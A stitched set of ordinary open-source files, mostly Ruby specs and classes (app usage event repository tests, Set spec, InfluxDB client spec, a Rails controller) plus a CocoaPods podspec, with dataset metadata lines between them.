event = repository.create_from_app(app)
expect(event).to match_app(app)
end
end
context 'when the package is failed' do
before do
app.current_droplet.update(state: DropletModel::FAILED_STATE)
app.reload
end
it 'will create an event with failed package state' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
end
end
end
context 'when an admin buildpack is associated with the app' do
before do
app.current_droplet.update(
buildpack_receipt_buildpack_guid: 'buildpack-guid',
buildpack_receipt_buildpack: 'buildpack-name'
)
end
it 'will create an event that contains the detected buildpack guid and name' do
event = repository.create_from_app(app)
expect(event).to match_app(app)
expect(event.buildpack_guid).to eq('buildpack-guid')
expect(event.buildpack_name).to eq('buildpack-name')
end
end
context 'when a custom buildpack is associated with the app' do
let(:buildpack_url) { 'https://git.example.com/repo.git' }
before do
app.app.lifecycle_data.update(buildpack: buildpack_url)
end
it 'will create an event with the buildpack url as the name' do
event = repository.create_from_app(app)
expect(event.buildpack_name).to eq('https://git.example.com/repo.git')
end
context 'where there are user credentials in the buildpack url' do
let(:buildpack_url) { 'https://super:[email protected]/repo.git' }
it 'redacts them' do
event = repository.create_from_app(app)
expect(event.buildpack_name).to eq('https://***:***@git.example.com/repo.git')
end
end
it 'will create an event without a buildpack guid' do
event = repository.create_from_app(app)
expect(event.buildpack_guid).to be_nil
end
end
context "when the DEA doesn't provide optional buildpack information" do
before do
app.app.lifecycle_data.update(buildpack: nil)
end
it 'will create an event that does not contain buildpack name or guid' do
event = repository.create_from_app(app)
expect(event.buildpack_guid).to be_nil
expect(event.buildpack_name).to be_nil
end
end
context 'fails to create the event' do
before do
app.state = nil
end
it 'will raise an error' do
expect {
repository.create_from_app(app)
}.to raise_error(Sequel::NotNullConstraintViolation)
end
end
context 'when the app already existed' do
let(:old_state) { 'STARTED' }
let(:old_instances) { 4 }
let(:old_memory) { 256 }
let(:app) { AppFactory.make(state: old_state, instances: old_instances, memory: old_memory) }
it 'always sets previous_package_state to UNKNOWN' do
event = repository.create_from_app(app)
expect(event.previous_package_state).to eq('UNKNOWN')
end
context 'when the same attribute values are set' do
before do
app.state = old_state
app.instances = old_instances
app.memory = old_memory
end
it 'creates event with previous attributes' do
event = repository.create_from_app(app)
expect(event.previous_state).to eq(old_state)
expect(event.previous_instance_count).to eq(old_instances)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
context 'when app attributes change' do
let(:new_state) { 'STOPPED' }
let(:new_instances) { 2 }
let(:new_memory) { 1024 }
before do
app.state = new_state
app.instances = new_instances
app.memory = new_memory
end
it 'stores new values' do
event = repository.create_from_app(app)
expect(event.state).to eq(new_state)
expect(event.instance_count).to eq(new_instances)
expect(event.memory_in_mb_per_instance).to eq(new_memory)
end
it 'stores previous values' do
event = repository.create_from_app(app)
expect(event.previous_state).to eq(old_state)
expect(event.previous_instance_count).to eq(old_instances)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
end
end
describe '#create_from_task' do
let!(:task) { TaskModel.make(memory_in_mb: 222) }
let(:state) { 'TEST_STATE' }
it 'creates an AppUsageEvent' do
expect {
repository.create_from_task(task, state)
}.to change { AppUsageEvent.count }.by(1)
end
describe 'the created event' do
it 'sets the state to what is passed in' do
event = repository.create_from_task(task, state)
expect(event.state).to eq('TEST_STATE')
end
it 'sets the attributes based on the task' do
event = repository.create_from_task(task, state)
expect(event.memory_in_mb_per_instance).to eq(222)
expect(event.previous_memory_in_mb_per_instance).to eq(222)
expect(event.instance_count).to eq(1)
expect(event.previous_instance_count).to eq(1)
expect(event.app_guid).to eq('')
expect(event.app_name).to eq('')
expect(event.space_guid).to eq(task.space.guid)
expect(event.space_guid).to be_present
expect(event.space_name).to eq(task.space.name)
expect(event.space_name).to be_present
expect(event.org_guid).to eq(task.space.organization.guid)
expect(event.org_guid).to be_present
expect(event.buildpack_guid).to be_nil
expect(event.buildpack_name).to be_nil
expect(event.previous_state).to eq('RUNNING')
expect(event.package_state).to eq('STAGED')
expect(event.previous_package_state).to eq('STAGED')
expect(event.parent_app_guid).to eq(task.app.guid)
expect(event.parent_app_guid).to be_present
expect(event.parent_app_name).to eq(task.app.name)
expect(event.parent_app_name).to be_present
expect(event.process_type).to be_nil
expect(event.task_guid).to eq(task.guid)
expect(event.task_name).to eq(task.name)
end
end
context 'when the task exists' do
let(:old_state) { TaskModel::RUNNING_STATE }
let(:old_memory) { 256 }
let(:existing_task) { TaskModel.make(state: old_state, memory_in_mb: old_memory) }
context 'when the same attribute values are set' do
before do
existing_task.memory_in_mb = old_memory
end
it 'creates event with previous attributes' do
event = repository.create_from_task(existing_task, state)
expect(event.previous_state).to eq(old_state)
expect(event.previous_package_state).to eq('STAGED')
expect(event.previous_instance_count).to eq(1)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
context 'when task attributes change' do
let(:new_state) { TaskModel::FAILED_STATE }
let(:new_memory) { 1024 }
before do
existing_task.memory_in_mb = new_memory
end
it 'stores new values' do
event = repository.create_from_task(existing_task, new_state)
expect(event.state).to eq(new_state)
expect(event.memory_in_mb_per_instance).to eq(new_memory)
end
it 'stores previous values' do
event = repository.create_from_task(existing_task, state)
expect(event.previous_state).to eq(old_state)
expect(event.previous_package_state).to eq('STAGED')
expect(event.previous_instance_count).to eq(1)
expect(event.previous_memory_in_mb_per_instance).to eq(old_memory)
end
end
end
end
describe '#create_from_build' do
let(:org) { Organization.make(guid: 'org-1') }
let(:space) { Space.make(guid: 'space-1', name: 'space-name', organization: org) }
let(:app_model) { AppModel.make(guid: 'app-1', name: 'frank-app', space: space) }
let(:package_state) { PackageModel::READY_STATE }
let(:package) { PackageModel.make(guid: 'package-1', app_guid: app_model.guid, state: package_state) }
let!(:build) { BuildModel.make(guid: 'build-1', package: package, app_guid: app_model.guid, state: BuildModel::STAGING_STATE) }
let(:state) { 'TEST_STATE' }
it 'creates an AppUsageEvent' do
expect {
repository.create_from_build(build, state)
}.to change { AppUsageEvent.count }.by(1)
end
describe 'the created event' do
it 'sets the state to what is passed in' do
event = repository.create_from_build(build, state)
expect(event.state).to eq('TEST_STATE')
end
it 'sets the attributes based on the build' do
build.update(
droplet: DropletModel.make(buildpack_receipt_buildpack: 'le-buildpack'),
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make
)
event = repository.create_from_build(build, state)
expect(event.state).to eq('TEST_STATE')
expect(event.previous_state).to eq('STAGING')
expect(event.instance_count).to eq(1)
expect(event.previous_instance_count).to eq(1)
expect(event.memory_in_mb_per_instance).to eq(1024)
expect(event.previous_memory_in_mb_per_instance).to eq(1024)
expect(event.org_guid).to eq('org-1')
expect(event.space_guid).to eq('space-1')
expect(event.space_name).to eq('space-name')
expect(event.parent_app_guid).to eq('app-1')
expect(event.parent_app_name).to eq('frank-app')
expect(event.package_guid).to eq('package-1')
expect(event.app_guid).to eq('')
expect(event.app_name).to eq('')
expect(event.process_type).to be_nil
expect(event.buildpack_name).to eq('le-buildpack')
expect(event.buildpack_guid).to be_nil
expect(event.package_state).to eq(package_state)
expect(event.previous_package_state).to eq(package_state)
expect(event.task_guid).to be_nil
expect(event.task_name).to be_nil
end
end
context 'buildpack builds' do
context 'when the build does NOT have an associated droplet but does have lifecycle data' do
before do
build.update(
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make(buildpack: 'http://git.url.example.com')
)
end
it 'sets the event buildpack_name to the lifecycle data buildpack' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to eq('http://git.url.example.com')
expect(event.buildpack_guid).to be_nil
end
context 'when buildpack lifecycle info contains credentials in buildpack url' do
before do
build.update(
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make(buildpack: 'http://ping:[email protected]')
)
end
it 'redacts credentials from the url' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to eq('http://***:***@example.com')
expect(event.buildpack_guid).to be_nil
end
end
end
context 'when the build has BOTH an associated droplet and lifecycle data' do
let!(:build) do
BuildModel.make(
:buildpack,
guid: 'build-1',
package_guid: package.guid,
app_guid: app_model.guid,
)
end
let!(:droplet) do
DropletModel.make(
:buildpack,
buildpack_receipt_buildpack: 'a-buildpack',
buildpack_receipt_buildpack_guid: 'a-buildpack-guid',
build: build
)
end
before do
build.update(
buildpack_lifecycle_data: BuildpackLifecycleDataModel.make(buildpack: 'ruby_buildpack')
)
end
it 'prefers the buildpack receipt info' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to eq('a-buildpack')
expect(event.buildpack_guid).to eq('a-buildpack-guid')
end
end
end
context 'docker builds' do
let!(:build) do
BuildModel.make(
:docker,
guid: 'build-1',
package_guid: package.guid,
app_guid: app_model.guid,
)
end
it 'does not include buildpack_guid or buildpack_name' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to be_nil
expect(event.buildpack_guid).to be_nil
end
end
context 'when the build is updating its state' do
let(:old_build_state) { BuildModel::STAGED_STATE }
let(:existing_build) { BuildModel.make(
guid: 'existing-build',
state: old_build_state,
package: package,
app_guid: app_model.guid)
}
context 'when the same attribute values are set' do
before do
existing_build.state = old_build_state
end
it 'creates event with previous attributes' do
event = repository.create_from_build(existing_build, state)
expect(event.previous_state).to eq(old_build_state)
expect(event.previous_package_state).to eq(package_state)
expect(event.previous_instance_count).to eq(1)
end
end
context 'when package attributes change' do
let(:new_state) { BuildModel::STAGED_STATE }
let(:new_package_state) { PackageModel::FAILED_STATE }
let(:new_memory) { 1024 }
before do
existing_build.package.state = new_package_state
end
it 'stores new values' do
event = repository.create_from_build(existing_build, new_state)
expect(event.state).to eq(new_state)
expect(event.package_state).to eq(new_package_state)
expect(event.instance_count).to eq(1)
end
it 'stores previous values' do
event = repository.create_from_build(existing_build, new_state)
expect(event.previous_state).to eq(old_build_state)
expect(event.previous_package_state).to eq(package_state)
expect(event.previous_instance_count).to eq(1)
end
end
context 'when the build has no package' do
let(:existing_build) { BuildModel.make(guid: 'existing-build', state: old_build_state, app_guid: app_model.guid) }
context 'when an attribute changes' do
before do
existing_build.state = BuildModel::STAGED_STATE
end
it 'returns no previous package state' do
event = repository.create_from_build(existing_build, state)
expect(event.previous_package_state).to be_nil
end
end
end
end
end
describe '#purge_and_reseed_started_apps!' do
let(:app) { AppFactory.make }
before do
# Truncate in mysql causes an implicit commit.
# This stub will cause the same behavior, but not commit.
allow(AppUsageEvent.dataset).to receive(:truncate) do
AppUsageEvent.dataset.delete
end
allow(AppObserver).to receive(:updated)
end
it 'will purge all existing events' do
3.times { repository.create_from_app(app) }
expect {
repository.purge_and_reseed_started_apps!
}.to change { AppUsageEvent.count }.to(0)
end
context 'when there are started apps' do
before do
app.state = 'STARTED'
app.save
AppFactory.make(state: 'STOPPED')
end
it 'creates new events for the started apps' do
app.state = 'STOPPED'
repository.create_from_app(app)
app.state = 'STARTED'
repository.create_from_app(app)
started_app_count = App.where(state: 'STARTED').count
expect(AppUsageEvent.count > 1).to be true
expect {
repository.purge_and_reseed_started_apps!
}.to change { AppUsageEvent.count }.to(started_app_count)
expect(AppUsageEvent.last).to match_app(app)
end
context 'with associated buildpack information' do
before do
app.current_droplet.update(
buildpack_receipt_buildpack: 'detected-name',
buildpack_receipt_buildpack_guid: 'detected-guid',
)
app.reload
end
it 'should preserve the buildpack info in the new event' do
repository.purge_and_reseed_started_apps!
event = AppUsageEvent.last
expect(event).to match_app(app)
expect(event.buildpack_name).to eq('detected-name')
expect(event.buildpack_guid).to eq('detected-guid')
end
end
describe 'package_state' do
context 'when the latest_droplet is STAGED' do
context 'and there is no current_droplet' do
before do
app.app.update(droplet: nil)
app.reload
end
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'and it is the current_droplet' do
it 'is STAGED' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('STAGED')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
end
context 'when the latest_droplet is FAILED' do
before do
DropletModel.make(app: app.app, package: app.latest_package, state: DropletModel::FAILED_STATE)
app.reload
end
it 'is FAILED' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('FAILED')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'when the latest_droplet is not STAGED or FAILED' do
before do
DropletModel.make(app: app.app, package: app.latest_package, state: DropletModel::STAGING_STATE)
app.reload
end
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'when there is no current_droplet' do
before do
app.current_droplet.destroy
app.reload
end
context 'and there is a package' do
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'and the package is FAILED' do
before do
app.latest_package.update(state: PackageModel::FAILED_STATE)
app.reload
end
it 'is FAILED' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('FAILED')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
end
context 'when a new package has been added to a previously staged app' do
before do
PackageModel.make(app: app.app)
app.reload
end
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
end
end
end
describe '#delete_events_older_than' do
let(:cutoff_age_in_days) { 1 }
before do
AppUsageEvent.dataset.delete
old = Time.now.utc - 999.days
3.times do
event = repository.create_from_app(App.make)
event.created_at = old
event.save
end
end
it 'will delete events created before the specified cutoff time' do
app = App.make
repository.create_from_app(app)
expect {
repository.delete_events_older_than(cutoff_age_in_days)
}.to change {
AppUsageEvent.count
}.to(1)
expect(AppUsageEvent.last).to match_app(app)
end
end
end
end
end
| 37.088193 | 135 | 0.57968 |
61c7984a6b3069124a382de7c378681ddc183bd4 | 1,305 | require File.expand_path('../../../spec_helper', __FILE__)
require 'set'
describe "Set#proper_superset?" do
before :each do
@set = Set[1, 2, 3, 4]
end
it "returns true if passed a Set that self is a proper superset of" do
@set.proper_superset?(Set[]).should be_true
Set[1, 2, 3].proper_superset?(Set[]).should be_true
Set["a", :b, ?c].proper_superset?(Set[]).should be_true
@set.proper_superset?(Set[1, 2, 3]).should be_true
@set.proper_superset?(Set[1, 3]).should be_true
@set.proper_superset?(Set[1, 2]).should be_true
@set.proper_superset?(Set[1]).should be_true
@set.proper_superset?(Set[5]).should be_false
@set.proper_superset?(Set[1, 5]).should be_false
@set.proper_superset?(Set[nil]).should be_false
@set.proper_superset?(Set["test"]).should be_false
@set.proper_superset?(@set).should be_false
Set[].proper_superset?(Set[]).should be_false
end
it "raises an ArgumentError when passed a non-Set" do
lambda { Set[].proper_superset?([]) }.should raise_error(ArgumentError)
lambda { Set[].proper_superset?(1) }.should raise_error(ArgumentError)
lambda { Set[].proper_superset?("test") }.should raise_error(ArgumentError)
lambda { Set[].proper_superset?(Object.new) }.should raise_error(ArgumentError)
end
end
| 37.285714 | 83 | 0.698084 |
0815d3d592e6c62a0fdc90b35f8cc9938d284a55 | 2,903 | #
# Be sure to run `pod lib lint MYPickerView.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'MYPickerView'
s.version = '0.1.0'
s.summary = 'A short description of MYPickerView.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/[email protected]/MYPickerView'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { '[email protected]' => '[email protected]' }
s.source = { :git => 'https://github.com/WenMingYan/MYPickerView.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = 'MYPickerView/Classes/**/*'
s.prefix_header_contents = <<-EOF
#ifdef __OBJC__
#ifndef weakify
#if __has_feature(objc_arc)
#define weakify( x ) \\
_Pragma("clang diagnostic push") \\
_Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
autoreleasepool{} __weak __typeof__(x) __weak_##x##__ = x; \\
_Pragma("clang diagnostic pop")
#else
#define weakify( x ) \\
_Pragma("clang diagnostic push") \\
_Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
autoreleasepool{} __block __typeof__(x) __block_##x##__ = x; \\
_Pragma("clang diagnostic pop")
#endif
#endif
#ifndef strongify
#if __has_feature(objc_arc)
#define strongify( x ) \\
_Pragma("clang diagnostic push") \\
_Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
try{} @finally{} __typeof__(x) x = __weak_##x##__; \\
_Pragma("clang diagnostic pop")
#else
#define strongify( x ) \\
_Pragma("clang diagnostic push") \\
_Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
try{} @finally{} __typeof__(x) x = __block_##x##__; \\
_Pragma("clang diagnostic pop")
#endif
#endif
#endif
EOF
# s.resource_bundles = {
# 'MYPickerView' => ['MYPickerView/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
s.dependency 'Masonry'
end
| 32.988636 | 107 | 0.606269 |
21b8b899b15d68a5709138814b4084b35d55ce56 | 1,551 | # frozen_string_literal: true
# auto_register: false
require 'dry/transaction'
require 'pg_export/import'
require 'pg_export/container'
require 'pg_export/lib/pg_export/value_objects/dump_file'
class PgExport
module Transactions
class ExportDump
include Dry::Transaction(container: PgExport::Container)
include Import['factories.dump_factory', 'adapters.bash_adapter']
step :prepare_params
step :build_dump
step :encrypt_dump, with: 'operations.encrypt_dump'
step :open_connection, with: 'operations.open_connection'
step :upload_dump
step :remove_old_dumps, with: 'operations.remove_old_dumps'
step :close_connection
private
def prepare_params(database_name:)
database_name = database_name.to_s
return Failure(message: 'Invalid database name') if database_name.empty?
Success(database_name: database_name)
end
def build_dump(database_name:)
dump = dump_factory.plain(
database: database_name,
file: bash_adapter.pg_dump(ValueObjects::DumpFile.new, database_name)
)
Success(dump: dump)
rescue bash_adapter.class::PgDumpError => e
Failure(message: 'Unable to dump database: ' + e.to_s)
end
def upload_dump(dump:, gateway:)
gateway.persist(dump.file, dump.name)
Success(dump: dump, gateway: gateway)
end
def close_connection(removed_dumps:, gateway:)
gateway.close
Success(gateway: gateway)
end
end
end
end
| 27.210526 | 80 | 0.687943 |
617ca3165e181e586c792819e1b39c666e079e0f | 717 | module FHIR
# fhir/currency_code.rb
class CurrencyCode < PrimitiveCode
include Mongoid::Document
def as_json(*args)
result = super
result.delete('id')
unless self.fhirId.nil?
result['id'] = self.fhirId
result.delete('fhirId')
end
result
end
def self.transform_json(json_hash, extension_hash, target = CurrencyCode.new)
result = target
unless extension_hash.nil?
result['fhirId'] = extension_hash['id'] unless extension_hash['id'].nil?
result['extension'] = extension_hash['extension'].map { |ext| Extension.transform_json(ext) }
end
result['value'] = json_hash
result
end
end
end
| 25.607143 | 101 | 0.624826 |
7ae2128ab71384019e5aa69d18560db3d43222a0 | 635 | namespace :ss do
#
# 0 * * * * bundle exec rake ss:hourly
#
task hourly: :environment do
if ::SS.config.cms.disable.blank?
::Tasks::Cms.each_sites do |site|
puts "# #{site.name} (#{site.host})"
# サイト内検索の更新
::Tasks::SS.invoke_task("cms:es:feed_releases", site.host) if site.elasticsearch_enabled?
# ページ書き出し
# ::Tasks::SS.invoke_task("cms:generate_page")
end
# RSS取込
::Tasks::SS.invoke_task("rss:import_items")
end
# Multiple DB
# ::Tasks::SS.invoke_task("ezine:pull_from_public")
# ::Tasks::SS.invoke_task("inquiry:pull_answers")
end
end
| 24.423077 | 97 | 0.606299 |
eddd04f684141c779a3bc60b4bc74856264f1286 | 1,906 | #
# This class was auto-generated.
#
require 'onlinepayments/sdk/data_object'
require 'onlinepayments/sdk/domain/mandate_customer'
module OnlinePayments::SDK
module Domain
# @attr [String] alias
# @attr [OnlinePayments::SDK::Domain::MandateCustomer] customer
# @attr [String] customer_reference
# @attr [String] recurrence_type
# @attr [String] status
# @attr [String] unique_mandate_reference
class MandateResponse < OnlinePayments::SDK::DataObject
attr_accessor :alias
attr_accessor :customer
attr_accessor :customer_reference
attr_accessor :recurrence_type
attr_accessor :status
attr_accessor :unique_mandate_reference
# @return (Hash)
def to_h
hash = super
hash['alias'] = @alias unless @alias.nil?
hash['customer'] = @customer.to_h if @customer
hash['customerReference'] = @customer_reference unless @customer_reference.nil?
hash['recurrenceType'] = @recurrence_type unless @recurrence_type.nil?
hash['status'] = @status unless @status.nil?
hash['uniqueMandateReference'] = @unique_mandate_reference unless @unique_mandate_reference.nil?
hash
end
def from_hash(hash)
super
@alias = hash['alias'] if hash.key? 'alias'
if hash.key? 'customer'
raise TypeError, "value '%s' is not a Hash" % [hash['customer']] unless hash['customer'].is_a? Hash
@customer = OnlinePayments::SDK::Domain::MandateCustomer.new_from_hash(hash['customer'])
end
@customer_reference = hash['customerReference'] if hash.key? 'customerReference'
@recurrence_type = hash['recurrenceType'] if hash.key? 'recurrenceType'
@status = hash['status'] if hash.key? 'status'
@unique_mandate_reference = hash['uniqueMandateReference'] if hash.key? 'uniqueMandateReference'
end
end
end
end
| 37.372549 | 109 | 0.679433 |
03ecdcbacda6e1fcefd2c36b5b1ddff8e98c4e37 | 100 | # frozen_string_literal: true
require_relative 'model/transaction'
require_relative 'model/report'
| 20 | 36 | 0.84 |
1d152c103f79b399c792a1c6b26c56d7443ce42c | 1,779 | # frozen_string_literal: true
class SkillsController < HtmlController
include Pagy::Backend
has_scope :exclude_deleted, only: :index, type: :boolean, default: true
has_scope :search, only: :index
def index
authorize Skill
@pagy, @skills = pagy apply_scopes(policy_scope(Skill.includes(:organization)))
end
def create
@skill = Skill.new skill_parameters
authorize @skill
return notice_and_redirect t(:skill_created, skill: @skill.skill_name), @skill if @skill.save
render :new
end
def show
@skill = Skill.includes(:organization).find params[:id]
authorize @skill
end
def new
@skill = Skill.new
authorize @skill
end
def destroy
@skill = Skill.find params.require(:id)
authorize @skill
if @skill.can_delete?
@skill.deleted_at = Time.zone.now
undo_notice_and_redirect t(:skill_deleted, skill_name: @skill.skill_name), undelete_skill_path, skills_path if @skill.save
else
render_deletion_error
end
end
def undelete
@skill = Skill.find params.require :id
authorize @skill
@skill.deleted_at = nil
notice_and_redirect t(:skill_restored, skill_name: @skill.skill_name), request.referer || skill_path(@skill) if @skill.save
end
private
def skill_parameters
params.require(:skill).permit(:skill_name, :organization_id, :skill_description, grade_descriptors_attributes: %i[mark grade_description _destroy])
end
def render_deletion_error
if Grade.where(skill: @skill).count != 0
notice_and_redirect t(:skill_not_deleted_because_grades), request.referer || skill_path(@skill)
elsif @skill.subjects.count != 0
notice_and_redirect t(:skill_not_deleted_because_subject), request.referer || skill_path(@skill)
end
end
end
| 27.369231 | 151 | 0.726251 |
b976badc33450b7f2d00fce3b0dfc398e7bd9f4c | 350 | require 'spec_helper'
describe Kata::Kyu8 do
it 'Return a fake binary number' do
Kata::Kyu8.fake_binary('45385593107843568').must_equal('01011110001100111')
Kata::Kyu8.fake_binary('509321967506747').must_equal('101000111101101')
Kata::Kyu8.fake_binary('366058562030849490134388085').must_equal('011011110000101010000011011')
end
end
| 35 | 99 | 0.782857 |
087f043a366b5b7d13dce08c682f8793c4fa580b | 73 | require_relative 'support/tuple_algebra'
require_relative 'support/keys'
| 24.333333 | 40 | 0.863014 |
61e90303759f103eceb6ea6e40f90eac373aa9ef | 2,793 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2018_01_01
module Models
#
# Response for the ListRouteFilters API service call.
#
class RouteFilterListResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<RouteFilter>] Gets a list of route filters in a resource
# group.
attr_accessor :value
# @return [String] The URL to get the next set of results.
attr_accessor :next_link
# return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<RouteFilter>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [RouteFilterListResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for RouteFilterListResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RouteFilterListResult',
type: {
name: 'Composite',
class_name: 'RouteFilterListResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'RouteFilterElementType',
type: {
name: 'Composite',
class_name: 'RouteFilter'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.93 | 80 | 0.524884 |
e212a8f4e97a719ccb365136bb8a2babc01c9390 | 1,768 | # frozen_string_literal: true
class CompareProjectCsvDecorator
include ActionView::Helpers::DateHelper
include ActionView::Helpers::NumberHelper
include ApplicationHelper
include ProjectsHelper
def initialize(project, host)
@project = project
@host = host
@url_decorator = CompareProjectUrlCsvDecorator.new(project, host)
@analysis_decorator = CompareProjectAnalysisCsvDecorator.new(project)
end
def activity
project_activity_text(@project, false).strip
end
def user_count
pluralize_with_delimiter(@project.user_count, t('compares.user'))
end
def rating_average
number_with_precision(@project.rating_average || 0, precision: 1)
end
def rating_count
@project.ratings.count
end
def licenses
licenses = @project.licenses
return t('compares.no_data') if licenses.blank?
licenses.map { |license| "#{license.short_name} #{h.license_url(license, host: @host)}" }.join(', ')
end
def managers
managers = @project.active_managers
return t('compares.position_not_yet_claimed') if managers.blank?
managers.map { |account| "#{account.name} #{h.account_url(account, host: @host)}" }.join(', ')
end
def t(*args)
I18n.t(*args)
end
def method_missing(method, *args)
return @url_decorator.send(method, *args) if @url_decorator.respond_to?(method)
return @analysis_decorator.send(method, *args) if @analysis_decorator.respond_to?(method)
return @project.send(method, *args) if @project.respond_to?(method)
super
end
def respond_to_missing?(method)
@url_decorator.respond_to?(method) ||
@analysis_decorator.respond_to?(method) ||
@project.respond_to?(method)
end
private
def h
Rails.application.routes.url_helpers
end
end
| 25.257143 | 104 | 0.723416 |
ac1829751ec7003ffbb51352947d8d7518f80c71 | 3,344 | require "spec_helper"
require "json"
describe InfluxDB::Client do
let(:subject) do
described_class.new(
"database",
{
host: "influxdb.test",
port: 9999,
username: "username",
password: "password",
time_precision: "s"
}.merge(args)
)
end
let(:args) { {} }
specify { is_expected.not_to be_stopped }
context "with basic auth" do
let(:args) { { auth_method: 'basic_auth' } }
let(:credentials) { "username:password" }
let(:auth_header) { { "Authorization" => "Basic " + Base64.encode64(credentials).chomp } }
let(:stub_url) { "http://influxdb.test:9999/" }
let(:url) { subject.send(:full_url, '/') }
it "GET" do
stub_request(:get, stub_url).with(headers: auth_header).to_return(body: '[]')
expect(subject.get(url, parse: true)).to eq []
end
it "POST" do
stub_request(:post, stub_url).with(headers: auth_header).to_return(status: 204)
expect(subject.post(url, {})).to be_a(Net::HTTPNoContent)
end
end
describe "#full_url" do
it "returns String" do
expect(subject.send(:full_url, "/unknown")).to be_a String
end
it "escapes params" do
url = subject.send(:full_url, "/unknown", value: ' !@#$%^&*()/\\_+-=?|`~')
encoded_fragment = "value=+%21%40%23%24%25%5E%26%2A%28%29%2F%5C_%2B-%3D%3F%7C%60"
encoded_fragment << (RUBY_ENGINE == "ruby" && RUBY_VERSION >= "2.5.0" ? "~" : "%7E")
expect(url).to include(encoded_fragment)
end
context "with prefix" do
let(:args) { { prefix: '/dev' } }
it "returns path with prefix" do
expect(subject.send(:full_url, "/series")).to start_with("/dev")
end
end
end
describe "GET #ping" do
it "returns OK" do
stub_request(:get, "http://influxdb.test:9999/ping")
.to_return(status: 204)
expect(subject.ping).to be_a(Net::HTTPNoContent)
end
context "with prefix" do
let(:args) { { prefix: '/dev' } }
it "returns OK with prefix" do
stub_request(:get, "http://influxdb.test:9999/dev/ping")
.to_return(status: 204)
expect(subject.ping).to be_a(Net::HTTPNoContent)
end
end
end
describe "GET #version" do
it "returns 1.1.1" do
stub_request(:get, "http://influxdb.test:9999/ping")
.to_return(status: 204, headers: { 'x-influxdb-version' => '1.1.1' })
expect(subject.version).to eq('1.1.1')
end
context "with prefix" do
let(:args) { { prefix: '/dev' } }
it "returns 1.1.1 with prefix" do
stub_request(:get, "http://influxdb.test:9999/dev/ping")
.to_return(status: 204, headers: { 'x-influxdb-version' => '1.1.1' })
expect(subject.version).to eq('1.1.1')
end
end
end
describe "Load balancing" do
let(:args) { { hosts: hosts } }
let(:hosts) do
[
"influxdb.test0",
"influxdb.test1",
"influxdb.test2"
]
end
let(:cycle) { 3 }
let!(:stubs) do
